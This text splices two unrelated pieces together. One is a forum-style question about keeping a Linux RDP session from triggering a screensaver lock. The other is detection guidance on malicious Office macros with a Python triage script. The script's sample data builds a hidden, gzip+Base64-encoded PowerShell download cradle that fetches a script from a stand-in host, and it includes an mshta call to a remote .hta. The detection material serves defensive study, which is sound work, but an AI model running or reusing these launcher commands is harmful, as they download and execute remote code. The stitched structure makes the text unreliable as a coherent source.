So, when I work from home, I use Kvpnc and tsclient (which I think is a front end to rdesktop, I am not sure) to connect to various Windows systems at work. For the most part, these work great, and crash far less than when I used Windows clients. One server is annoying, though. It's an XP Pro box where I have to be on the desktop because it has proprietary monitoring clients and it's on an access list that is otherwise restricted from our VPN. I do have administrator access to this box, but not as the user I log into to get some of this software working (which authenticates not only by the remote desktop's IP, but the AD login). In essence, I have to have these graphs and alert systems up, and they only allow access from this remote desktop.

The AD has all users at this "safe" level to have screensavers pop on at 15 minutes. So in essence, I have to jiggle my mouse every 15 minutes or else the screen saver kicks in, and I have to type in my password to get my desktop back. Well, I *could,* but then *everyone* would have the settings fixed in this group, and that would make the boss a saaaad panda. Yeah, a pisser, but I could... Problem is that there's a 50% chance that the login prompt won't come back. Like, the desktop wallpaper will redraw, but that's it. So you have to disconnect from tsclient. Not only that, but sometimes you have to disconnect the VPN connection, then reconnect, reconnect tsclient, and THEN the desktop will come up with a prompt.

What we think is happening is that one of the monitoring software processes pops up a dialog box that steals focus, and so it wants you to hit "Go away" before it allows you to do anything else in Windows. Why disconnecting tsclient and the VPN "resets" this, we have no idea, and so we're not 100% convinced this is what's going on. But this happens also in Windows clients, and if you're logged into the box via console. With Windows, however, there's a little program we have as part of an internal suite of packages that sends a fake "mouse jiggle" to any RDP session you have open. Is there anything like this for Linux? I am using Ubuntu, because it makes Linux snobs mad, and I like the lazy, worry-free Compiz setup.

This detection identifies suspicious processes spawned by Microsoft Office applications, which could indicate that a malicious actor is using a malicious document. Malicious actors use phishing emails to deliver such documents. The documents typically leverage macros, which are small Visual Basic for Applications (VBA) scripts embedded inside Microsoft Office documents such as Word, PowerPoint, and Excel. The macro runs commands through built-in Windows utilities (PowerShell, mshta.exe and the like) to download malware and compromise the system. Other methods of executing malicious code from an Office document include Dynamic Data Exchange (DDE) objects and exploitation of software vulnerabilities in the Office application itself.

Recommendation: Review the command passed to PowerShell to determine whether it is malicious activity. A malicious actor can obfuscate the command, pass it Base64-encoded (for example via -EncodedCommand, which expects Base64 of UTF-16LE text), or compress it with gzip before encoding it, so decode every layer before judging it. Review the URL passed to mshta.exe to identify whether it comes from a trusted source. Review the firewall and web proxy logs from this endpoint to identify any malware retrieval from remote systems. If necessary, rebuild the host from a known good source and have the user change their password.
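To make the Office-spawned-process triage steps above concrete, here is an added example; it is not code from the original page or from any vendor's detection rule. It takes constructed process-creation events, flags Office parents that spawn living-off-the-land children, decodes the Base64/UTF-16LE script behind -EncodedCommand, peels the gzip+Base64 launcher layer the guidance warns about, and pulls out URLs to check against proxy and firewall logs. The process lists, event fields, host names and the example.invalid URLs are assumptions made for the example.

```python
"""Triage Office-spawned LOLBin children, decoding PowerShell -EncodedCommand and
gzip+Base64 launcher layers.  Added example; every event below is constructed."""
import base64
import gzip
import re

# Process names of interest.  Hypothetical tuning lists, not a vendor's rule content.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                   "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENC_RE = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Base64 literal handed to [Convert]::FromBase64String(...) inside a script.
B64_LITERAL_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL_RE = re.compile(r"(?i)\b(?:https?|ftp|file)://[^\s'\"()]+")
CRADLE_RE = re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|iwr\b|Invoke-Expression|\bIEX\b")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def unwrap_base64_layers(script, max_depth=5):
    """Peel nested FromBase64String(...) layers; gunzip when the bytes carry the gzip magic."""
    for _ in range(max_depth):
        m = B64_LITERAL_RE.search(script)
        if not m:
            break
        try:
            raw = base64.b64decode(m.group(1), validate=True)
            if raw[:2] == b"\x1f\x8b":
                raw = gzip.decompress(raw)
            # UTF-16LE text of ASCII content is full of NUL bytes; plain text is not.
            script = raw.decode("utf-16-le" if b"\x00" in raw else "utf-8")
        except (ValueError, OSError, UnicodeDecodeError):
            break
    return script


def triage(events):
    """Flag Office parents spawning LOLBins; return one finding per match."""
    findings = []
    for ev in events:
        parent, child = basename(ev["parent_image"]), basename(ev["image"])
        if parent not in OFFICE_PARENTS or child not in LOLBIN_CHILDREN:
            continue
        cmd = ev["command_line"]
        decoded = decode_encoded_command(cmd) if child in ("powershell.exe", "pwsh.exe") else None
        final = unwrap_base64_layers(decoded) if decoded else cmd
        findings.append({
            "host": ev["host"], "parent": parent, "child": child,
            "encoded": decoded is not None,
            "final_command": final,
            "urls": URL_RE.findall(final),          # what to look for in proxy/firewall logs
            "download_cradle": bool(CRADLE_RE.search(final)),
        })
    return findings


def build_encoded_cmdline(stage2):
    """Build the gzip+Base64-inside-UTF-16LE-Base64 launcher shape common in maldoc macros.
    Constructed for the sample data; it is the inverse of the two decoders above."""
    gz = base64.b64encode(gzip.compress(stage2.encode())).decode()
    stage1 = ("IEX (New-Object IO.StreamReader((New-Object IO.Compression.GzipStream("
              "(New-Object IO.MemoryStream(,[Convert]::FromBase64String('%s'))),"
              "[IO.Compression.CompressionMode]::Decompress)))).ReadToEnd()" % gz)
    return "powershell.exe -nop -w hidden -enc " + base64.b64encode(stage1.encode("utf-16-le")).decode()


# Constructed process-creation events (Sysmon Event ID 1 style).  example.invalid is a
# reserved name, not a real host; hosts WS-* are made up.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
SAMPLE_EVENTS = [
    {"host": "WS-0142", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": build_encoded_cmdline(STAGE2)},
    {"host": "WS-0142", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://example.invalid/invoice.hta"},
    {"host": "WS-0077", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe", "command_line": "splwow64.exe 12288"},   # print helper, benign
    {"host": "WS-0090", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["host"], f["parent"], "->", f["child"], "| encoded:", f["encoded"],
              "| cradle:", f["download_cradle"], "| urls:", f["urls"])
        print("   ", f["final_command"][:120])
```

Two caveats worth carrying into real telemetry: -EncodedCommand is Base64 of UTF-16LE, so a plain Base64 decode shows the script with a NUL byte after every character (which is why the decoder switches to UTF-16LE when it sees NULs); and the mshta.exe finding is surfaced with its URL rather than scored, because the check in the guidance is whether the source is trusted, a judgement the analyst makes against the proxy and firewall logs rather than one the regex can make.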